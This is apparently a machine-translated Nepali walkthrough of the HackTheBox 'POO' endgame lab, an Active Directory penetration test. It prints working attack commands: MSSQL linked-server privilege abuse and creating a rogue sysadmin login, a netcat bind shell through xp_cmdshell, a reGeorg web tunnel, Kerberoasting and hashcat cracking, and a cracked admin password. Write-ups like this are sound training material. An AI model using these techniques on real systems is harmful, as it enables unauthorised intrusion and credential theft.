HackTheBoxendgame। प्रयोगशाला व्यावसायिक आपत्तिजनक संचालन को पारित। Pentest सक्रिय निर्देशिका

यस लेखमा हामी केवल एक मेसिनको मात्र होइन, तर साइटबाट सम्पूर्ण मिनी-प्रयोगशालाको मार्गको विश्लेषण गर्नेछौं। HackTheBox.

वर्णनमा उल्लेख गरिए अनुसार, POO सानो सक्रिय निर्देशिका वातावरणमा आक्रमणका सबै चरणहरूमा सीपहरू परीक्षण गर्न डिजाइन गरिएको हो। लक्ष्य भनेको उपलब्ध होस्टसँग सम्झौता गर्नु, विशेषाधिकारहरू बढाउने, र अन्ततः प्रक्रियामा 5 झण्डाहरू सङ्कलन गरेर सम्पूर्ण डोमेनलाई सम्झौता गर्नु हो।

प्रयोगशालामा जडान VPN मार्फत छ। काम गर्ने कम्प्युटर वा तपाईंको लागि महत्त्वपूर्ण डेटा भएको होस्टबाट जडान नगर्न सिफारिस गरिन्छ, किनकि तपाईं सूचना सुरक्षाको बारेमा केही थाहा भएका व्यक्तिहरूसँग निजी नेटवर्कमा प्रवेश गर्नुहुन्छ 🙂

संगठनात्मक जानकारी
नयाँ लेख, सफ्टवेयर र अन्य जानकारीको बारेमा थाहा पाउनको लागि मैले सिर्जना गरेको छु टेलिग्राम च्यानल и कुनै पनि मुद्दाहरू छलफल गर्न समूह IIKB को क्षेत्रमा। साथै तपाईको व्यक्तिगत अनुरोध, प्रश्न, सुझाव र सिफारिसहरू हेरेर सबैलाई जवाफ दिनेछु।.

सबै जानकारी शैक्षिक उद्देश्यका लागि मात्र प्रदान गरिएको छ। यस कागजातको लेखकले यस कागजातको अध्ययनको परिणाम स्वरूप प्राप्त ज्ञान र विधिहरू प्रयोग गर्दा कसैलाई भएको क्षतिको लागि कुनै जिम्मेवारी लिने छैन।

परिचय

यो अन्त्य खेलमा दुईवटा मेसिनहरू हुन्छन् र यसमा ५ वटा झण्डाहरू हुन्छन्।

उपलब्ध होस्टको विवरण र ठेगाना पनि दिइएको छ।

सुरु गरौं!

पुन: झण्डा

यो मेसिनको 10.13.38.11 को IP ठेगाना छ जुन मैले /etc/hosts मा थप्छु।
10.13.38.11 poo.htb

पहिलो चरण खुला पोर्टहरू स्क्यान गर्न हो। सबै पोर्टहरू nmap मार्फत स्क्यान गर्न लामो समय लाग्ने भएकोले, म यसलाई पहिले masscan मार्फत गर्नेछु। हामी 0pps मा tun500 इन्टरफेसबाट सबै TCP र UDP पोर्टहरू स्क्यान गर्छौं।

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

अब, पोर्टहरूमा चल्ने सेवाहरूको बारेमा थप विस्तृत जानकारी प्राप्त गर्न, -A विकल्पको साथ स्क्यान चलाउनुहोस्।

nmap -A poo.htb -p80,1433

त्यसैले हामीसँग IIS र MSSQL सेवाहरू छन्। यस अवस्थामा, हामी डोमेन र कम्प्युटरको वास्तविक DNS नाम फेला पार्नेछौं। वेब सर्भरमा हामीलाई IIS गृह पृष्ठद्वारा स्वागत छ।

डाइरेक्टरीहरूमा पुनरावृत्ति गरौं। म यसको लागि गोबस्टर प्रयोग गर्दछु। प्यारामिटरहरूमा हामीले स्ट्रिमहरूको संख्या 128 (-t), URL (-u), शब्दकोश (-w) र हामीलाई रुचि राख्ने विस्तारहरू (-x) निर्दिष्ट गर्छौं।

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

यसले हामीलाई /admin डाइरेक्टरी, साथै पहुँचयोग्य डेस्कटप सेवा DS_Store फाइलको लागि HTTP प्रमाणीकरण दिन्छ। .DS_Store फाइलहरू हुन् जसले फोल्डरका लागि अनुकूल सेटिङहरू भण्डार गर्दछ, जस्तै फाइलहरूको सूची, आइकन स्थानहरू, र चयन गरिएको पृष्ठभूमि छवि। यस्तो फाइल वेब विकासकर्ताहरूको वेब सर्भर डाइरेक्टरीमा समाप्त हुन सक्छ। यस तरिकाले हामी डाइरेक्टरीका सामग्रीहरूको बारेमा जानकारी प्राप्त गर्छौं। यसका लागि तपाईले प्रयोग गर्न सक्नुहुन्छ DS_Store क्रलर.

python3 dsstore_crawler.py -i http://poo.htb/

हामीले डाइरेक्टरीको सामग्रीहरू पाउँछौं। यहाँ सबैभन्दा चाखलाग्दो कुरा /dev डाइरेक्टरी हो, जसबाट हामी स्रोतहरू र db फाइलहरू दुई शाखाहरूमा हेर्न सक्छौं। तर यदि सेवा IIS ShortName लाई कमजोर छ भने हामी फाइल र डाइरेक्टरी नामहरूको पहिलो 6 वर्णहरू प्रयोग गर्न सक्छौं। तपाईं प्रयोग गरेर यो जोखिम लागि जाँच गर्न सक्नुहुन्छ IIS छोटो नाम स्क्यानर.

र हामीले एउटा पाठ फाइल फेला पार्छौं जुन "poo_co" बाट सुरु हुन्छ। अब के गर्ने थाहा छैन, मैले "co" बाट सुरु हुने सबै शब्दहरू निर्देशिकाहरूको शब्दकोशबाट मात्र चयन गरें।

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

र wfuzz संग पुनरावृत्ति गर्नुहोस्।

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

र हामी सही शब्द फेला पार्छौं! हामी यो फाइल हेर्छौं, प्रमाणहरू बचत गर्छौं (DBNAME प्यारामिटर द्वारा न्याय गर्दै, तिनीहरू MSSQL बाट हुन्)।

हामी झण्डा समर्पण गर्छौं र हामी २०% अगाडि बढ्छौं।

हाहा झण्डा

हामी MSSQL मा जडान गर्छौं, म DBeaver प्रयोग गर्छु।

हामीले यस डाटाबेसमा चाखलाग्दो कुरा फेला पारेनौं, SQL सम्पादक सिर्जना गरौं र त्यहाँ के प्रयोगकर्ताहरू छन् भनेर जाँच गरौं।

SELECT name FROM master..syslogins;

हामीसँग दुई प्रयोगकर्ता छन्। हाम्रो विशेषाधिकार जाँच गरौं।

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

तसर्थ, कुनै विशेषाधिकारहरू छैनन्। लिङ्क गरिएका सर्भरहरू हेरौं, मैले यस प्रविधिको बारेमा विस्तृत रूपमा लेखेको छु यहाँ.

SELECT * FROM master..sysservers;

त्यसैले हामी अर्को SQL सर्भर फेला पार्छौं। Openquery() प्रयोग गरेर यो सर्भरमा आदेशहरूको कार्यान्वयन जाँच गरौं।

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

र हामी क्वेरी रूख पनि निर्माण गर्न सक्छौं।

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

बिन्दु यो हो कि जब हामी लिङ्क गरिएको सर्भरमा अनुरोध गर्छौं, अनुरोध अर्को प्रयोगकर्ताको सन्दर्भमा कार्यान्वयन गरिन्छ! हामी कुन प्रयोगकर्ताको सन्दर्भमा लिङ्क गरिएको सर्भरमा काम गरिरहेका छौं हेरौं।

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

र अब हेरौं कुन सन्दर्भमा हाम्रो लिङ्क गरिएको सर्भरबाट अनुरोध कार्यान्वयन हुन्छ!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

तसर्थ, यो DBO सन्दर्भ हो जसमा सबै विशेषाधिकारहरू हुनुपर्छ। लिङ्क गरिएको सर्भरबाट अनुरोधको अवस्थामा विशेषाधिकारहरू जाँच गरौं।

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

तपाईले देख्न सक्नुहुन्छ, हामीसँग सबै विशेषाधिकारहरू छन्! यसरी आफ्नो Admin बनाऔं। तर तिनीहरूले यसलाई ओपनक्वेरी मार्फत अनुमति दिँदैनन्, यसलाई EXECUTE AT मार्फत गरौं।

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

र अब हामी नयाँ प्रयोगकर्ताको प्रमाणहरूसँग जडान गर्छौं, नयाँ फ्ल्याग डाटाबेस अवलोकन गर्नुहोस्।

हामी यो झण्डा हस्तान्तरण गर्छौं र अगाडि बढ्छौं।

ब्याकट्र्याक झण्डा

MSSQL प्रयोग गरेर शेल प्राप्त गरौं, म इम्प्याकेट प्याकेजबाट mssqlclient प्रयोग गर्दैछु।

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

हामीले पासवर्डहरू प्राप्त गर्न आवश्यक छ, र हामीले पहिले नै भेटेका पहिलो कुरा साइट हो। यसैले, हामीलाई वेब सर्भर कन्फिगरेसन चाहिन्छ (यो एक सुविधाजनक शेल फाल्न असम्भव छ, स्पष्ट रूपमा फायरवालले काम गरिरहेको छ)।

तर पहुँच अस्वीकार गरिएको छ। यद्यपि हामी MSSQL बाट फाइल पढ्न सक्छौं, हामीले केवल कुन प्रोग्रामिङ भाषाहरू कन्फिगर गरिएका छन् भनेर जान्न आवश्यक छ। र MSSQL डाइरेक्टरीमा हामीले पत्ता लगायौं कि त्यहाँ पाइथन छ।

त्यसपछि web.config फाइल पढ्न कुनै समस्या छैन।

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

प्रमाणहरू फेला परेको साथ, / admin मा जानुहोस् र झण्डा उठाउनुहोस्।

खुट्टाको झण्डा

वास्तवमा, त्यहाँ फायरवाल प्रयोग गर्दा केही असुविधाहरू छन्, तर नेटवर्क सेटिङहरू हेर्दै, हामीले IPv6 पनि प्रयोग गरिएको छ भनेर याद गर्छौं!

यो ठेगाना /etc/hosts मा थपौं।
dead:babe::1001 poo6.htb
होस्टलाई फेरि स्क्यान गरौं, तर यस पटक IPv6 मा।

र WinRM सेवा IPv6 मा उपलब्ध छ। भेटिएका प्रमाणहरूसँग जडान गरौं।

डेस्कटपमा झण्डा छ, हामी यसलाई हस्तान्तरण गर्छौं।

P00ned झण्डा

संग होस्ट मा टोही पछि winpeas हामीले विशेष केही पाउँदैनौं। त्यसपछि फेरि प्रमाणहरू खोज्ने निर्णय गरियो (मैले पनि यस विषयमा लेखेको छु लेख)। तर मैले WinRM मार्फत प्रणालीबाट सबै SPN हरू प्राप्त गर्न सकिन।

setspn.exe -T intranet.poo -Q */*

MSSQL मार्फत आदेश कार्यान्वयन गरौं।

यो विधि प्रयोग गरेर, हामीले p00_hr र p00_adm प्रयोगकर्ताहरूको SPN प्राप्त गर्छौं, जसको मतलब तिनीहरू Kerberoasting जस्ता आक्रमणको लागि जोखिममा छन्। छोटकरीमा, हामी तिनीहरूको पासवर्ड ह्यासहरू प्राप्त गर्न सक्छौं।

पहिले तपाईंले MSSQL प्रयोगकर्ताको रूपमा स्थिर शेल प्राप्त गर्न आवश्यक छ। तर हामी पहुँचमा सीमित भएकाले, हामीसँग पोर्ट 80 र 1433 मार्फत मात्र होस्टसँग सञ्चार छ। तर पोर्ट 80 मार्फत ट्राफिक टनेल गर्न सम्भव छ! यसका लागि हामी प्रयोग गर्नेछौं अर्को आवेदन। वेब सर्भरको गृह डाइरेक्टरीमा फाइल tunnel.aspx अपलोड गरौं - C:inetpubwwwroot।

तर जब हामीले यसलाई पहुँच गर्ने प्रयास गर्छौं, हामीले 404 त्रुटि पाउँछौं। यसको मतलब यो हो कि *.aspx फाइलहरू कार्यान्वयन हुँदैनन्। यी एक्सटेन्सन भएका फाइलहरू कार्यान्वयन गर्नको लागि, निम्नानुसार ASP.NET 4.5 स्थापना गर्नुहोस्।

dism /online /enable-feature /all /featurename:IIS-ASPNET45

र अब, tunnel.aspx पहुँच गर्दा, हामीले जवाफ पाउँछौं कि सबै जान तयार छ।

अनुप्रयोगको ग्राहक भाग सुरु गरौं, जसले ट्राफिक रिले गर्नेछ। हामी पोर्ट 5432 बाट सबै ट्राफिक सर्भरमा फर्वार्ड गर्नेछौं।

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

र हामी हाम्रो प्रोक्सी मार्फत कुनै पनि अनुप्रयोगको ट्राफिक पठाउन प्रोक्सीचेन प्रयोग गर्छौं। यो प्रोक्सीलाई /etc/proxychains.conf कन्फिगरेसन फाइलमा थपौं।

अब सर्भरमा कार्यक्रम अपलोड गरौं नेटक्याट, जसको साथ हामी एक स्थिर बाँध खोल, र स्क्रिप्ट बनाउनेछौं Kerberoast बोलाउनुहोस्, जसको साथ हामी एक Kerberoasting आक्रमण गर्नेछौं।

अब हामी MSSQL मार्फत श्रोता सुरु गर्छौं।

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

र हामी हाम्रो प्रोक्सी मार्फत जडान गर्छौं।

proxychains rlwrap nc poo.htb 4321

र हैस प्राप्त गरौं।

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

अर्को तपाईंले यी ह्यासहरू दोहोर्याउन आवश्यक छ। rockyou शब्दकोशले यी पासवर्डहरू समावेश नगरेको हुनाले, मैले Seclists मा प्रदान गरिएका सबै पासवर्ड शब्दकोशहरू प्रयोग गरें। खोज को लागी हामी hashcat प्रयोग गर्दछौं।

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

र हामीले दुवै पासवर्डहरू फेला पार्छौं, पहिलो डच_passwordlist.txt शब्दकोशमा, र दोस्रो Keyboard-Combinations.txt मा।

र त्यसैले हामीसँग तीन प्रयोगकर्ताहरू छन्, हामी डोमेन नियन्त्रकमा जान्छौं। पहिले उनको ठेगाना पत्ता लगाउनुहोस्।

राम्रो, हामीले डोमेन नियन्त्रकको IP ठेगाना पत्ता लगायौं। डोमेनका सबै प्रयोगकर्ताहरू पत्ता लगाउनुहोस्, साथै तिनीहरूमध्ये कुन प्रशासक हो। जानकारी प्राप्त गर्न स्क्रिप्ट डाउनलोड गर्न PowerView.ps1। त्यसपछि हामी दुष्ट-विनर्म प्रयोग गरेर जडान गर्नेछौं, -s प्यारामिटरमा लिपिसँग डाइरेक्टरी निर्दिष्ट गर्दै। र त्यसपछि हामी केवल PowerView स्क्रिप्ट लोड गर्नेछौं।

अब हामीसँग यसको सबै प्रकार्यहरूमा पहुँच छ। p00_adm प्रयोगकर्ता एक विशेषाधिकार प्राप्त प्रयोगकर्ता जस्तो देखिन्छ, त्यसैले हामी उहाँको सन्दर्भमा काम गर्नेछौं। यो प्रयोगकर्ताको लागि PSCcredential वस्तु सिर्जना गरौं।

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

अब सबै Powershell आदेशहरू जहाँ हामीले क्रेडिटहरू निर्दिष्ट गर्छौं p00_adm को तर्फबाट कार्यान्वयन गरिनेछ। प्रयोगकर्ताहरूको सूची र AdminCount विशेषता प्रदर्शन गरौं।

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

र त्यसैले, हाम्रो प्रयोगकर्ता साँच्चै विशेषाधिकार प्राप्त छ। उहाँ कुन समूहमा आबद्ध हुनुहुन्छ हेरौं।

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

हामी अन्ततः प्रयोगकर्ता डोमेन प्रशासक हो भनेर पुष्टि गर्छौं। यसले यसलाई टाढाबाट डोमेन नियन्त्रकमा लग इन गर्ने अधिकार दिन्छ। हाम्रो सुरुङ प्रयोग गरेर WinRM सँग लगइन गर्ने प्रयास गरौं। म दुष्ट-विनर्म प्रयोग गर्दा reGeorg द्वारा जारी त्रुटिहरू द्वारा अलमलमा परें।

त्यसपछि हामी अर्को, सजिलो प्रयोग गर्छौं, लिपि WinRM मा जडान गर्न। जडान प्यारामिटरहरू खोल्नुहोस् र परिवर्तन गर्नुहोस्।

हामी जडान गर्ने प्रयास गर्छौं, र हामी प्रणालीमा छौं।

तर झण्डा छैन । त्यसपछि प्रयोगकर्तालाई हेर्नुहोस् र डेस्कटपहरू जाँच गर्नुहोस्।

mr3ks मा हामीले झण्डा फेला पार्छौं र प्रयोगशाला 100% पूरा भयो।

यति नै। प्रतिक्रियाको रूपमा, तपाईंले यस लेखबाट केही नयाँ सिक्नुभयो कि र यो तपाईंको लागि उपयोगी थियो कि भनेर टिप्पणी गर्नुहोस्।

तपाईं हामीलाई मा सामेल हुन सक्नुहुन्छ तार। त्यहाँ तपाईं रोचक सामग्री, मर्ज पाठ्यक्रमहरू, साथै सफ्टवेयर पाउन सक्नुहुन्छ। एउटा समुदाय भेला गरौं जसमा IT को धेरै क्षेत्रहरू बुझ्ने मानिसहरू हुनेछन्, त्यसपछि हामी सधैं कुनै पनि IT र सूचना सुरक्षा मुद्दाहरूमा एकअर्कालाई मद्दत गर्न सक्छौं।

स्रोत: www.habr.com